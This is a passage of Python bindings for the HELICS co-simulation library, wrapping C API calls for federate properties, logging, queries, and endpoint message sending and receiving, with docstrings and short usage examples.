err = helicsErrorInitialize()
f(fed.handle, cchar(separator), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateSetIntegerProperty(fed: HelicsFederate, property: HelicsProperty, value: int):
"""
Set an integer based property of a federate.
**Parameters**
- **`fed`** - The federate to change the property for.
- **`property`** - `helics.HelicsProperty`.
- **`value`** - The value of the property.
"""
f = loadSym("helicsFederateSetIntegerProperty")
err = helicsErrorInitialize()
f(fed.handle, HelicsProperty(property), value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateGetTimeProperty(fed: HelicsFederate, time_property: int) -> HelicsTime:
"""
Get the current value of a time based property in a federate.
**Parameters**
- **`fed`** - The federate to query.
- **`time_property`** - The property to query.
**Returns**: `helics.HelicsTime`.
"""
f = loadSym("helicsFederateGetTimeProperty")
err = helicsErrorInitialize()
result = f(fed.handle, time_property, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsFederateGetFlagOption(fed: HelicsFederate, flag: Union[int, HelicsFederateFlag, HelicsFlag]) -> bool:
"""
Get a flag value for a federate.
**Parameters**
- **`fed`** - The federate to get the flag for.
- **`flag`** - The `helics.HelicsFederateFlag` to query.
"""
f = loadSym("helicsFederateGetFlagOption")
err = helicsErrorInitialize()
try:
flag = HelicsFlag(flag)
except Exception as _:
flag = HelicsFederateFlag(flag)
result = f(fed.handle, flag, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result == 1
def helicsFederateGetIntegerProperty(fed: HelicsFederate, property: HelicsProperty) -> int:
"""
Get the current value of an integer property (such as a logging level).
**Parameters**
- **`fed`** - The federate to get the flag for.
- **`property`** - A code for the property to set `helics.HelicsProperty`.
"""
f = loadSym("helicsFederateGetIntegerProperty")
err = helicsErrorInitialize()
result = f(fed.handle, HelicsProperty(property), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsFederateGetCurrentTime(fed: HelicsFederate) -> HelicsTime:
"""
Get the current time of the federate.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to query.
**Returns**: `helics.HelicsTime`.
"""
f = loadSym("helicsFederateGetCurrentTime")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsFederateSetGlobal(fed: HelicsFederate, name: str, value: str):
"""
Set a federation global value through a federate.
This overwrites any previous value for this name.
**Parameters**
- **`fed`** - The federate to set the global through.
- **`name`** - The name of the global to set.
- **`value`** - The value of the global.
"""
f = loadSym("helicsFederateSetGlobal")
err = helicsErrorInitialize()
f(fed.handle, cstring(name), cstring(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateAddDependency(fed: HelicsFederate, name: str):
"""
Add a time dependency for a federate. The federate will depend on the given named federate for time synchronization.
**Parameters**
- **`fed`** - The federate to add the dependency for.
- **`name`** - The name of the federate to depend on.
"""
f = loadSym("helicsFederateAddDependency")
err = helicsErrorInitialize()
f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateSetLogFile(fed: HelicsFederate, log_file: str):
"""
Set the logging file for a federate (actually on the core associated with a federate).
**Parameters**
- **`fed`** - The federate to set the log file for.
- **`log_file`** - The name of the log file.
"""
f = loadSym("helicsFederateSetLogFile")
err = helicsErrorInitialize()
f(fed.handle, cstring(log_file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateLogErrorMessage(fed: HelicsFederate, log_message: str):
"""
Log an error message through a federate.
**Parameters**
- **`fed`** - The federate to log the error message through.
- **`log_message`** - The message to put in the log.
"""
f = loadSym("helicsFederateLogErrorMessage")
err = helicsErrorInitialize()
f(fed.handle, cstring(log_message), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateLogWarningMessage(fed: HelicsFederate, log_message: str):
"""
Log a warning message through a federate.
**Parameters**
- **`fed`** - The federate to log the warning message through.
- **`log_message`** - The message to put in the log.
"""
f = loadSym("helicsFederateLogWarningMessage")
err = helicsErrorInitialize()
f(fed.handle, cstring(log_message), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateLogInfoMessage(fed: HelicsFederate, log_message: str):
"""
Log an info message through a federate.
**Parameters**
- **`fed`** - The federate to log the info message through.
- **`log_message`** - The message to put in the log.
"""
f = loadSym("helicsFederateLogInfoMessage")
err = helicsErrorInitialize()
f(fed.handle, cstring(log_message), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateLogDebugMessage(fed: HelicsFederate, log_message: str):
"""
Log a debug message through a federate.
**Parameters**
- **`fed`** - The federate to log the debug message through.
- **`log_message`** - The message to put in the log.
"""
f = loadSym("helicsFederateLogDebugMessage")
err = helicsErrorInitialize()
f(fed.handle, cstring(log_message), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateLogLevelMessage(fed: HelicsFederate, log_level: HelicsLogLevel, log_message: str):
"""
Log a message through a federate.
**Parameters**
- **`fed`** - The federate to log the message through.
- **`log_level`** - The level of the message to log see `helics.HelicsLogLevel`.
- **`log_message`** - The message to put in the log.
"""
f = loadSym("helicsFederateLogLevelMessage")
err = helicsErrorInitialize()
f(fed.handle, HelicsLogLevel(log_level), cstring(log_message), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
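# Example (illustrative sketch): routing a federate's log output to a file and
# emitting messages at different levels. The enum member name
# `HelicsLogLevel.WARNING` is an assumption.
#
#     helicsFederateSetLogFile(fed, "fed1.log")
#     helicsFederateLogInfoMessage(fed, "starting simulation")
#     helicsFederateLogLevelMessage(fed, HelicsLogLevel.WARNING, "slow convergence")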
def helicsCoreSetGlobal(core: HelicsCore, name: str, value: str):
"""
Set a global value in a core.
This overwrites any previous value for this name.
**Parameters**
- **`core`** - The core to set the global through.
- **`name`** - The name of the global to set.
- **`value`** - The value of the global.
"""
f = loadSym("helicsCoreSetGlobal")
err = helicsErrorInitialize()
f(core.handle, cstring(name), cstring(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerSetGlobal(broker: HelicsBroker, name: str, value: str):
"""
Set a federation global value.
This overwrites any previous value for this name.
**Parameters**
- **`broker`** - The broker to set the global through.
- **`name`** - The name of the global to set.
- **`value`** - The value of the global.
"""
f = loadSym("helicsBrokerSetGlobal")
err = helicsErrorInitialize()
f(broker.handle, cstring(name), cstring(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCoreSetLogFile(core: HelicsCore, log_file: str):
"""
Set the log file on a core.
**Parameters**
- **`core`** - The core to set the log file for.
- **`log_file`** - The name of the file to log to.
"""
f = loadSym("helicsCoreSetLogFile")
err = helicsErrorInitialize()
f(core.handle, cstring(log_file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerSetLogFile(broker: HelicsBroker, log_file: str):
"""
Set the log file on a broker.
**Parameters**
- **`broker`** - The broker to set the log file for.
- **`log_file`** - The name of the file to log to.
"""
f = loadSym("helicsBrokerSetLogFile")
err = helicsErrorInitialize()
f(broker.handle, cstring(log_file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCreateQuery(target_name: str, query_string: str) -> HelicsQuery:
"""
Create a query object.
A query object consists of a target and query string.
**Parameters**
- **`target_name`** - The name of the target to query.
- **`query_string`** - The query to make of the target.
**Returns**: `helics.HelicsQuery`.
"""
f = loadSym("helicsCreateQuery")
result = f(cstring(target_name), cstring(query_string))
return HelicsQuery(result)
def helicsQueryExecute(query: HelicsQuery, fed: HelicsFederate) -> JSONType:
"""
Execute a query.
The call will block until the query finishes which may require communication or other delays.
**Parameters**
- **`query`** - The query object to use in the query.
- **`fed`** - A federate to send the query through.
**Returns**: String that contains the result of the query that was executed.
"""
f = loadSym("helicsQueryExecute")
err = helicsErrorInitialize()
result = f(query.handle, fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
s = ffi.string(result).decode()
try:
return json.loads(s)
except json.JSONDecodeError:
warnings.warn("This function will return a JSON object in the next major release")
return s
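# Example (illustrative sketch): asking the federation for the list of federate
# names through an existing federate, then releasing the query object. The target
# and query strings follow the HELICS query documentation.
#
#     q = helicsCreateQuery("federation", "federates")
#     federate_names = helicsQueryExecute(q, fed)
#     helicsQueryFree(q)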
def helicsQueryCoreExecute(query: HelicsQuery, core: HelicsCore) -> JSONType:
"""
Execute a query directly on a core.
The call will block until the query finishes which may require communication or other delays.
**Parameters**
- **`query`** - The query object to use in the query.
- **`core`** - The core to send the query to.
**Returns**: String that contains the result of the query that was executed.
"""
f = loadSym("helicsQueryCoreExecute")
err = helicsErrorInitialize()
result = f(query.handle, core.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
s = ffi.string(result).decode()
try:
return json.loads(s)
except json.JSONDecodeError:
warnings.warn("This function will return a JSON object in the next major release")
return s
def helicsQueryBrokerExecute(query: HelicsQuery, broker: HelicsBroker) -> JSONType:
"""
Execute a query directly on a broker.
The call will block until the query finishes which may require communication or other delays.
**Parameters**
- **`query`** - The query object to use in the query.
- **`broker`** - The broker to send the query to.
**Returns**: String that contains the result of the query that was executed.
"""
f = loadSym("helicsQueryBrokerExecute")
err = helicsErrorInitialize()
result = f(query.handle, broker.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
s = ffi.string(result).decode()
try:
return json.loads(s)
except json.JSONDecodeError:
warnings.warn("This function will return a JSON object in the next major release")
return s
def helicsQueryExecuteAsync(query: HelicsQuery, fed: HelicsFederate):
"""
Execute a query in a non-blocking call.
**Parameters**
- **`query`** - The query object to use in the query.
- **`fed`** - A federate to send the query through.
"""
f = loadSym("helicsQueryExecuteAsync")
err = helicsErrorInitialize()
f(query.handle, fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsQueryExecuteComplete(query: HelicsQuery) -> JSONType:
"""
Complete the return from a query called with `helics.helicsQueryExecuteAsync`.
The function will block until the query completes; `helics.helicsQueryIsCompleted` can be called to determine whether the query has completed.
**Parameters**
- **`query`** - The query object to complete execution of.
**Returns**: String that contains the result of the query that was executed.
"""
f = loadSym("helicsQueryExecuteComplete")
err = helicsErrorInitialize()
result = f(query.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
s = ffi.string(result).decode()
try:
return json.loads(s)
except json.JSONDecodeError:
warnings.warn("This function will return a JSON object in the next major release")
return s
def helicsQueryIsCompleted(query: HelicsQuery) -> bool:
"""
Check if an asynchronously executed query has completed.
This function should usually be called after a QueryExecuteAsync function has been called.
**Parameters**
- **`query`** - The query object to check if completed
**Returns**: `True` if an asynchronous query has completed or a regular query call was made with a result, and `False` if an asynchronous query has not completed or is invalid.
"""
f = loadSym("helicsQueryIsCompleted")
result = f(query.handle)
return result == 1
def helicsQuerySetTarget(query: HelicsQuery, target_name: str):
"""
Update the target of a query.
**Parameters**
- **`query`** - The query object to change the target of.
- **`target_name`** - The name of the target to query.
"""
f = loadSym("helicsQuerySetTarget")
err = helicsErrorInitialize()
f(query.handle, cstring(target_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsQuerySetQueryString(query: HelicsQuery, query_string: str):
"""
Update the queryString of a query.
**Parameters**
- **`query`** - The query object to change the target of.
- **`query_string`** - The new query string.
"""
f = loadSym("helicsQuerySetQueryString")
err = helicsErrorInitialize()
f(query.handle, cstring(query_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsQueryFree(query: HelicsQuery):
"""
Free the memory associated with a query object.
"""
f = loadSym("helicsQueryFree")
f(query.handle)
def helicsCleanupLibrary():
"""
Function to do some housekeeping work.
This runs some cleanup routines and tries to close out any residual threads that haven't been shut down yet.
"""
f = loadSym("helicsCleanupLibrary")
f()
def helicsFederateRegisterEndpoint(fed: HelicsFederate, name: str, type: str) -> HelicsEndpoint:
"""
Create an endpoint.
The endpoint becomes part of the federate and is destroyed when the federate is freed, so there are no separate free functions for endpoints.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create an endpoint; must have been created with `helicsCreateMessageFederate` or `helicsCreateCombinationFederate`.
- **`name`** - The identifier for the endpoint. This will be prepended with the federate name for the global identifier.
- **`type`** - A string describing the expected type of the endpoint (optional).
**Returns**: `helics.HelicsEndpoint`.
"""
f = loadSym("helicsFederateRegisterEndpoint")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsEndpoint(result, cleanup=False)
def helicsFederateRegisterGlobalEndpoint(fed: HelicsFederate, name: str, type: str = "") -> HelicsEndpoint:
"""
Create an endpoint.
The endpoint becomes part of the federate and is destroyed when the federate is freed, so there are no separate free functions for endpoints.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create an endpoint; must have been created with `helicsCreateMessageFederate` or `helicsCreateCombinationFederate`.
- **`name`** - The identifier for the endpoint; the given name is the global identifier.
- **`type`** - A string describing the expected type of the endpoint (optional).
**Returns**: `helics.HelicsEndpoint`.
"""
f = loadSym("helicsFederateRegisterGlobalEndpoint")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsEndpoint(result, cleanup=False)
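# Example (illustrative sketch): creating a locally named and a globally named
# endpoint on a message federate. `helicsCreateMessageFederate` is assumed from
# earlier in this module; the names are placeholders.
#
#     ep = helicsFederateRegisterEndpoint(fed, "control", "")
#     ep_global = helicsFederateRegisterGlobalEndpoint(fed, "grid/control")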
def helicsFederateGetEndpoint(fed: HelicsFederate, name: str) -> HelicsEndpoint:
"""
Get an endpoint object from a name.
**Parameters**
- **`fed`** - The message `helics.HelicsFederate` to use to get the endpoint.
- **`name`** - The name of the endpoint.
**Returns**: `helics.HelicsEndpoint`.
"""
f = loadSym("helicsFederateGetEndpoint")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsEndpoint(result, cleanup=False)
def helicsFederateGetEndpointByIndex(fed: HelicsFederate, index: int) -> HelicsEndpoint:
"""
Get an endpoint by its index, typically one already created via a registerInterfaces file or similar.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to query.
- **`index`** - The index of the endpoint to get.
**Returns**: `helics.HelicsEndpoint`.
"""
f = loadSym("helicsFederateGetEndpointByIndex")
err = helicsErrorInitialize()
result = f(fed.handle, index, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsEndpoint(result, cleanup=False)
def helicsEndpointIsValid(endpoint: HelicsEndpoint) -> bool:
"""
Check if an endpoint is valid.
**Parameters**
- **`endpoint`** - The endpoint object to check.
**Returns**: `True` if the Endpoint object represents a valid endpoint.
"""
f = loadSym("helicsEndpointIsValid")
result = f(endpoint.handle)
return result == 1
def helicsEndpointSetDefaultDestination(endpoint: HelicsEndpoint, destination: str):
"""
Set the default destination for an endpoint if no other endpoint is given.
**Parameters**
- **`endpoint`** - The endpoint to set the destination for.
- **`destination`** - A string naming the desired default endpoint.
"""
f = loadSym("helicsEndpointSetDefaultDestination")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(destination), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointGetDefaultDestination(endpoint: HelicsEndpoint) -> str:
"""
Get the default destination for an endpoint.
**Parameters**
- **`endpoint`** - The endpoint to query.
**Returns**: A string with the default destination.
"""
f = loadSym("helicsEndpointGetDefaultDestination")
result = f(endpoint.handle)
return ffi.string(result).decode()
def helicsEndpointSendBytes(endpoint: HelicsEndpoint, data: bytes):
"""
Send a message from a specific endpoint.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`data`** - The data to send.
"""
err = helicsErrorInitialize()
if isinstance(data, str):
data = data.encode()
if not isinstance(data, bytes):
raise HelicsException(
"""Raw data must be of type `bytes`. Got {t} instead. Try converting it to bytes (e.g. `"hello world".encode()`""".format(t=type(data))
)
inputDataLength = len(data)
f = loadSym("helicsEndpointSendBytes")
f(endpoint.handle, data, inputDataLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointSendBytesTo(endpoint: HelicsEndpoint, data: bytes, destination: str):
"""
Send a message to the specified destination.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`data`** - The data to send.
- **`destination`** - The target destination.
"""
err = helicsErrorInitialize()
if isinstance(data, str):
data = data.encode()
if not isinstance(data, bytes):
raise HelicsException(
"""Raw data must be of type `bytes`. Got {t} instead. Try converting it to bytes (e.g. `"hello world".encode()`""".format(t=type(data))
)
inputDataLength = len(data)
if HELICS_VERSION == 2:
f = loadSym("helicsEndpointSendMessageRaw")
f(endpoint.handle, cstring(destination), data, inputDataLength, err)
else:
f = loadSym("helicsEndpointSendBytesTo")
f(endpoint.handle, data, inputDataLength, cstring(destination), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
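# Example (illustrative sketch): sending raw bytes from an endpoint, both to its
# default destination and to an explicitly named endpoint. The destination name is
# a placeholder.
#
#     helicsEndpointSetDefaultDestination(ep, "other_fed/control")
#     helicsEndpointSendBytes(ep, b"ping")
#     helicsEndpointSendBytesTo(ep, b"hello", "other_fed/control")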
def helicsEndpointSendMessageRaw(endpoint: HelicsEndpoint, destination: str, data: bytes):
"""
Send a message to the specified destination.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`destination`** - The target destination.
- **`data`** - The data to send.
**DEPRECATED**
Use `helicsEndpointSendBytesTo` instead
"""
warnings.warn("This function is deprecated. Use `helicsEndpointSendBytesTo` instead.")
helicsEndpointSendBytesTo(endpoint, data, destination)
def helicsEndpointSendBytesToAt(endpoint: HelicsEndpoint, data: bytes, destination: str, time: HelicsTime):
"""
Send a message at a specific time to the specified destination.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`data`** - The data to send.
- **`destination`** - The target destination.
- **`time`** - The time the message should be sent.
"""
err = helicsErrorInitialize()
if isinstance(data, str):
data = data.encode()
if not isinstance(data, bytes):
raise HelicsException(
"""Raw data must be of type `bytes`. Got {t} instead. Try converting it to bytes (e.g. `"hello world".encode()`""".format(t=type(data))
)
inputDataLength = len(data)
if HELICS_VERSION == 2:
f = loadSym("helicsEndpointSendEventRaw")
f(endpoint.handle, cstring(destination), data, inputDataLength, time, err)
else:
f = loadSym("helicsEndpointSendBytesToAt")
f(endpoint.handle, data, inputDataLength, cstring(destination), time, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointSendEventRaw(
endpoint: HelicsEndpoint,
destination: str,
data: bytes,
time: HelicsTime,
):
"""
Send a message at a specific time to the specified destination.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`destination`** - The target destination.
- **`data`** - The data to send.
- **`time`** - The time the message should be sent.
**DEPRECATED**
Use `helicsEndpointSendBytesToAt` instead.
"""
warnings.warn("This function is deprecated. Use `helicsEndpointSendBytesToAt` instead.")
helicsEndpointSendBytesToAt(endpoint, data, destination, time)
def helicsEndpointSendMessageObject(endpoint: HelicsEndpoint, message: HelicsMessage):
"""
Send a message object from a specific endpoint.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`message`** - The actual message to send which will be copied.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsEndpointSendMessage` instead.")
return helicsEndpointSendMessage(endpoint, message)
def helicsEndpointSendMessageObjectZeroCopy(endpoint: HelicsEndpoint, message: HelicsMessage):
"""
Send a message object from a specific endpoint.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`message`** - The actual message to send which will be copied.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsEndpointSendMessage` instead.")
return helicsEndpointSendMessage(endpoint, message)
def helicsEndpointSendMessage(endpoint: HelicsEndpoint, message: HelicsMessage):
"""
Send a message object from a specific endpoint.
**Parameters**
- **`endpoint`** - The endpoint to send the data from.
- **`message`** - The actual message to send which will be copied.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsEndpointSendMessageObject")
else:
f = loadSym("helicsEndpointSendMessage")
err = helicsErrorInitialize()
f(endpoint.handle, message.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointSubscribe(endpoint: HelicsEndpoint, name: str):
"""
Subscribe an endpoint to a publication.
**Parameters**
- **`endpoint`** - The endpoint to use.
- **`name`** - The name of the publication.
"""
f = loadSym("helicsEndpointSubscribe")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateHasMessage(fed: HelicsFederate) -> bool:
"""
Check if the federate has any outstanding messages.
**Parameters**
- **`fed`** - The federate to check.
**Returns**: `True` if the federate has a message waiting, `False` otherwise.
"""
f = loadSym("helicsFederateHasMessage")
result = f(fed.handle)
return result == 1
def helicsEndpointHasMessage(endpoint: HelicsEndpoint) -> bool:
"""
Check if a given endpoint has any unread messages.
**Parameters**
- **`endpoint`** - The endpoint to check.
**Returns**: `True` if the endpoint has a message, `False` otherwise.
"""
f = loadSym("helicsEndpointHasMessage")
result = f(endpoint.handle)
return result == 1
def helicsFederatePendingMessageCount(fed: HelicsFederate) -> int:
"""
Returns the number of pending messages across all endpoints of a federate.
**Parameters**
- **`fed`** - The federate to get the number of waiting messages from.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsFederatePendingMessages")
else:
f = loadSym("helicsFederatePendingMessageCount")
return f(fed.handle)
def helicsFederatePendingMessages(fed: HelicsFederate) -> int:
"""
Returns the number of pending messages across all endpoints of a federate.
**Parameters**
- **`fed`** - The federate to get the number of waiting messages from.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsFederatePendingMessageCount` instead.")
return helicsFederatePendingMessageCount(fed)
def helicsEndpointPendingMessages(endpoint: HelicsEndpoint) -> int:
"""
Returns the number of pending messages for a specific endpoint.
**Parameters**
- **`endpoint`** - The endpoint to query.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsEndpointPendingMessageCount` instead.")
return helicsEndpointPendingMessageCount(endpoint)
def helicsEndpointPendingMessageCount(endpoint: HelicsEndpoint) -> int:
"""
Returns the number of pending messages for a specific endpoint.
**Parameters**
- **`endpoint`** - The endpoint to query.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsEndpointPendingMessages")
else:
f = loadSym("helicsEndpointPendingMessageCount")
return f(endpoint.handle)
def helicsEndpointGetMessageObject(endpoint: HelicsEndpoint) -> HelicsMessage:
"""
Receive a packet from a particular endpoint.
**Parameters**
- **`endpoint`** - The identifier for the endpoint.
**Returns**: A message.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsEndpointGetMessage` instead.")
return helicsEndpointGetMessage(endpoint)
def helicsEndpointGetMessage(endpoint: HelicsEndpoint) -> HelicsMessage:
"""
Receive a packet from a particular endpoint.
**Parameters**
- **`endpoint`** - The identifier for the endpoint.
**Returns**: A message object.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsEndpointGetMessageObject")
else:
f = loadSym("helicsEndpointGetMessage")
return HelicsMessage(f(endpoint.handle))
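# Example (illustrative sketch): draining received messages from an endpoint after a
# time request has been granted, using the message accessors defined later in this
# module.
#
#     while helicsEndpointHasMessage(ep):
#         msg = helicsEndpointGetMessage(ep)
#         print(helicsMessageGetSource(msg), helicsMessageGetTime(msg), helicsMessageGetString(msg))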
def helicsEndpointCreateMessageObject(endpoint: HelicsEndpoint) -> HelicsMessage:
"""
Create a new empty message.
The message is empty and isValid will return false since there is no data associated with the message yet.
**Parameters**
- **`endpoint`** - The endpoint object to associate the message with.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsEndpointCreateMessage` instead")
return helicsEndpointCreateMessage(endpoint)
def helicsEndpointCreateMessage(endpoint: HelicsEndpoint) -> HelicsMessage:
"""
Create a new empty message object.
The message is empty and isValid will return false since there is no data associated with the message yet.
**Parameters**
- **`endpoint`** - The endpoint object to associate the message with.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsEndpointCreateMessageObject")
else:
f = loadSym("helicsEndpointCreateMessage")
err = helicsErrorInitialize()
result = f(endpoint.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsMessage(result)
def helicsFederateGetMessageObject(fed: HelicsFederate) -> HelicsMessage:
"""
Receive a communication message for any endpoint in the federate.
The return order will be in order of endpoint creation.
So all messages that are available for the first endpoint, then all for the second, and so on.
Within a single endpoint, the messages are ordered by time, then source_id, then order of arrival.
**Returns**: A `helics.HelicsMessage` which references the data in the message.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use helicsFederateGetMessage instead")
return helicsFederateGetMessage(fed)
def helicsFederateGetMessage(fed: HelicsFederate) -> HelicsMessage:
"""
Receive a communication message for any endpoint in the federate.
The return order will be in order of endpoint creation.
So all messages that are available for the first endpoint, then all for the second, and so on.
Within a single endpoint, the messages are ordered by time, then source_id, then order of arrival.
**Returns**: A `helics.HelicsMessage` which references the data in the message.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsFederateGetMessageObject")
else:
f = loadSym("helicsFederateGetMessage")
result = f(fed.handle)
return HelicsMessage(result)
def helicsFederateCreateMessageObject(fed: HelicsFederate) -> HelicsMessage:
"""
Create a new empty message object.
The message is empty and isValid will return false since there is no data associated with the message yet.
**Parameters**
- **`fed`** - the `helics.HelicsFederate` to associate the message with.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use helicsFederateCreateMessage instead")
return helicsFederateCreateMessage(fed)
def helicsFederateCreateMessage(fed: HelicsFederate) -> HelicsMessage:
"""
Create a new empty message object.
The message is empty and isValid will return false since there is no data associated with the message yet.
**Parameters**
- **`fed`** - the `helics.HelicsFederate` to associate the message with.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsFederateCreateMessageObject")
else:
f = loadSym("helicsFederateCreateMessage")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsMessage(result)
def helicsFederateClearMessages(fed: HelicsFederate):
"""
Clear all stored messages from a federate.
This clears messages retrieved through `helics.helicsFederateGetMessage` or `helics.helicsFederateGetMessageObject`.
**Parameters**
- **`fed`** - The federate to clear the message for.
"""
f = loadSym("helicsFederateClearMessages")
f(fed.handle)
def helicsEndpointClearMessages(endpoint: HelicsEndpoint):
"""
Clear all message from an endpoint.
**Deprecated**: Use `helics.helicsFederateClearMessages` to free all messages, or `helics.helicsMessageFree` to free an individual message.
**Parameters**
- **`endpoint`** - The endpoint object to operate on.
**DEPRECATED**
"""
if HELICS_VERSION == 2:
warnings.warn("This function is deprecated. Clearing is handled at the federate level.")
f = loadSym("helicsEndpointClearMessages")
f(endpoint.handle)
else:
warnings.warn("This function is deprecated. Clearing is handled at the federate level.")
def helicsEndpointGetType(endpoint: HelicsEndpoint) -> str:
"""
Get the type specified for an endpoint.
**Parameters**
- **`endpoint`** - The endpoint object in question.
**Returns**: The defined type of the endpoint.
"""
f = loadSym("helicsEndpointGetType")
result = f(endpoint.handle)
return ffi.string(result).decode()
def helicsEndpointGetName(endpoint: HelicsEndpoint) -> str:
"""
Get the name of an endpoint.
**Parameters**
- **`endpoint`** - The endpoint object in question.
**Returns**: The name of the endpoint.
"""
f = loadSym("helicsEndpointGetName")
result = f(endpoint.handle)
return ffi.string(result).decode()
def helicsFederateGetEndpointCount(fed: HelicsFederate) -> int:
"""
Get the number of endpoints in a federate.
**Parameters**
- **`fed`** - The message federate to query.
**Returns**: (-1) if fed was not a valid federate, otherwise returns the number of endpoints.
"""
f = loadSym("helicsFederateGetEndpointCount")
result = f(fed.handle)
return result
def helicsEndpointGetInfo(endpoint: HelicsEndpoint) -> str:
"""
Get the data in the info field of an endpoint.
**Parameters**
- **`endpoint`** - The endpoint to query.
**Returns**: A string with the info field string.
"""
f = loadSym("helicsEndpointGetInfo")
result = f(endpoint.handle)
return ffi.string(result).decode()
def helicsEndpointSetInfo(endpoint: HelicsEndpoint, info: str):
"""
Set the data in the info field for an endpoint.
**Parameters**
- **`endpoint`** - The endpoint to alter.
- **`info`** - The string to set.
"""
